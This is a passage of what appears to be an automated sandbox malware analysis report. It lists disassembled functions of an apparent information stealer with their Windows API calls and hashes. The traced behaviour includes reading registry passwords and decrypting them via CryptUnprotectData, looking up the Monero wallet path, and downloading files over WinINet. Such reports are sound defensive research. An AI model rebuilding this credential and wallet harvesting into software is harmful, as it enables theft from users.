                                  • lstrcat.KERNEL32(?,?), ref: 0031E0D4
                                  • lstrcat.KERNEL32(?,0102D1A8), ref: 0031E0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0031E126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: 237d03bee1619df3316890658b195d7de9aed14a377ef4f389838301ffb67409
                                  • Instruction ID: 6ecec46b254c9b7aaef7907b8299be85e479fef4704de90fc7e703633ca936e5
                                  • Opcode Fuzzy Hash: 237d03bee1619df3316890658b195d7de9aed14a377ef4f389838301ffb67409
                                  • Instruction Fuzzy Hash: 3C616FB191111CABCB5ADB64CC58ADE77B8BF5C300F1049A5BA09A7390DF709F899F90
                                  Function 00306AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00306AFF
                                  • InternetOpenA.WININET(0032CFEC,00000001,00000000,00000000,00000000), ref: 00306B2C
                                  • StrCmpCA.SHLWAPI(?,0102E3A8), ref: 00306B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00306B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00306B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00306BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00306BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00306BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 00306C10
                                  • InternetCloseHandle.WININET(00000000), ref: 00306C17
                                  • InternetCloseHandle.WININET(?), ref: 00306C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: d4545298477dcbf3a2de4ee70c9f4cf15b25638d3e2ef72da35f4a00ba22f5d4
                                  • Instruction ID: e0570be86115b50d4ca544d65f1a9edc1220180274afb045b331320fd51ba2b7
                                  • Opcode Fuzzy Hash: d4545298477dcbf3a2de4ee70c9f4cf15b25638d3e2ef72da35f4a00ba22f5d4
                                  • Instruction Fuzzy Hash: 034194B1601205ABDB25DF64DC9AFAE77B8EB14700F004454FA05EB2C0DF70AE549BA4
                                  Function 0030BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030BC1F
                                  • lstrlen.KERNEL32(00000000), ref: 0030BC52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030BC7C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030BC84
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030BCAC
                                  • lstrlen.KERNEL32(00334AD4), ref: 0030BD23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 60a6a861e640125c160aae5013c75706fd67948a3526cb102f5e282963cbc408
                                  • Instruction ID: 04ef26b3bfb100d0411503405caa58fc90288c9febc546208f7a062e0fc94771
                                  • Opcode Fuzzy Hash: 60a6a861e640125c160aae5013c75706fd67948a3526cb102f5e282963cbc408
                                  • Instruction Fuzzy Hash: 7EA18370A02205CFCB26DF68D969AAEF7B4AF54304F198069E406DB3A1DF31DC45DB50
                                  Function 00325EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00325F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00326014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 0032609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003260D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: 298212f656c547e0fac7e9c9c3e335258e41ea4a0a04537bdceb50464e4ba3cc
                                  • Instruction ID: 77607e68a17d2282cb922b4aa4dc5137118d3705679c22f71d5f961c16fbfb56
                                  • Opcode Fuzzy Hash: 298212f656c547e0fac7e9c9c3e335258e41ea4a0a04537bdceb50464e4ba3cc
                                  • Instruction Fuzzy Hash: 1561C170714514EBDB1ACF5CEDD196EB3BAEF84300B248A09E4828B781C730EE80D794
                                  Function 0031E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031E07D
                                  • lstrcat.KERNEL32(?,?), ref: 0031E098
                                  • lstrcat.KERNEL32(?,?), ref: 0031E0AC
                                  • lstrcat.KERNEL32(?,0101B0E0), ref: 0031E0C0
                                  • lstrcat.KERNEL32(?,?), ref: 0031E0D4
                                  • lstrcat.KERNEL32(?,0102D1A8), ref: 0031E0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031E11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0031E126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: 981061c522e3a1a4d8c3a29631b6973b6025910fb5c9d4f77876b04e8dd7d175
                                  • Instruction ID: 6cb6f8a5176bbc70b4411dc40dcbfa37c8d0abbd318737ddb949ce3a7d2a63ad
                                  • Opcode Fuzzy Hash: 981061c522e3a1a4d8c3a29631b6973b6025910fb5c9d4f77876b04e8dd7d175
                                  • Instruction Fuzzy Hash: 63419F7191111CABCB2AEB68DC59ADE73B4BF5C300F1049A4F90A97291DF709F899F90
                                  Function 00307A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00307805
                                    • Part of subcall function 003077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0030784A
                                    • Part of subcall function 003077D0: StrStrA.SHLWAPI(?,Password), ref: 003078B8
                                    • Part of subcall function 003077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003078EC
                                    • Part of subcall function 003077D0: HeapFree.KERNEL32(00000000), ref: 003078F3
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 00307A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 00307ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00307ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00307AF0
                                  • wsprintfA.USER32 ref: 00307B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00307B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00307B47
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 00307B60
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                  • String ID: :
                                  • API String ID: 398153587-3653984579
                                  • Opcode ID: fa595717c3267337bcc267fbc3eb48aa62944a838f6bf953d18760a653229567
                                  • Instruction ID: aef8b857a19106d1d0f146da036c4e2029ec693448347b07d5806937b521f34e
                                  • Opcode Fuzzy Hash: fa595717c3267337bcc267fbc3eb48aa62944a838f6bf953d18760a653229567
                                  • Instruction Fuzzy Hash: 1E31F672E01214AFCB16DBA8DC98AAFB779EB94300F140519F50593390DB70F909EBA0
                                  Function 003181B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 0031820C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00318243
                                  • lstrlen.KERNEL32(00000000), ref: 00318260
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00318297
                                  • lstrlen.KERNEL32(00000000), ref: 003182B4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003182EB
                                  • lstrlen.KERNEL32(00000000), ref: 00318308
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00318337
                                  • lstrlen.KERNEL32(00000000), ref: 00318351
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00318380
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 1dbf9db40a7da92c59593cb7635f9bf3bc348e74cbd96d894af337c8d2db8e14
                                  • Instruction ID: a275dd4c6c7301e59fbb1e859a73ee369820e35ababbddbae62b8bcd5eddced5
                                  • Opcode Fuzzy Hash: 1dbf9db40a7da92c59593cb7635f9bf3bc348e74cbd96d894af337c8d2db8e14
                                  • Instruction Fuzzy Hash: 94517079A016029BDB1ADF78D858AABB7B8EF48700F154914AD16DB344DF30EDA1CBD0
                                  Function 003077D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00307805
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0030784A
                                  • StrStrA.SHLWAPI(?,Password), ref: 003078B8
                                    • Part of subcall function 00307750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0030775E
                                    • Part of subcall function 00307750: RtlAllocateHeap.NTDLL(00000000), ref: 00307765
                                    • Part of subcall function 00307750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0030778D
                                    • Part of subcall function 00307750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003077AD
                                    • Part of subcall function 00307750: LocalFree.KERNEL32(?), ref: 003077B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003078EC
                                  • HeapFree.KERNEL32(00000000), ref: 003078F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00307A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: 8288a736743fc5a549425222585813787f6dd88b38d0fa8774070f37f0c9d16e
                                  • Instruction ID: 2d81bdd25afa7d769df5b30e8f73a9bc0d71f588614b5ff4eb55046fd2708877
                                  • Opcode Fuzzy Hash: 8288a736743fc5a549425222585813787f6dd88b38d0fa8774070f37f0c9d16e
                                  • Instruction Fuzzy Hash: 5D7120B1D0121DEFDB11DF95DC90AEEB7B9EF48300F104569E509A7240EB75AA89CB90
                                  Function 00301120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00301135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0030113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00301159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00301173
                                  • RegCloseKey.ADVAPI32(?), ref: 0030117D
                                  Strings
                                  • wallet_path, xrefs: 0030116D
                                  • SOFTWARE\monero-project\monero-core, xrefs: 0030114F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
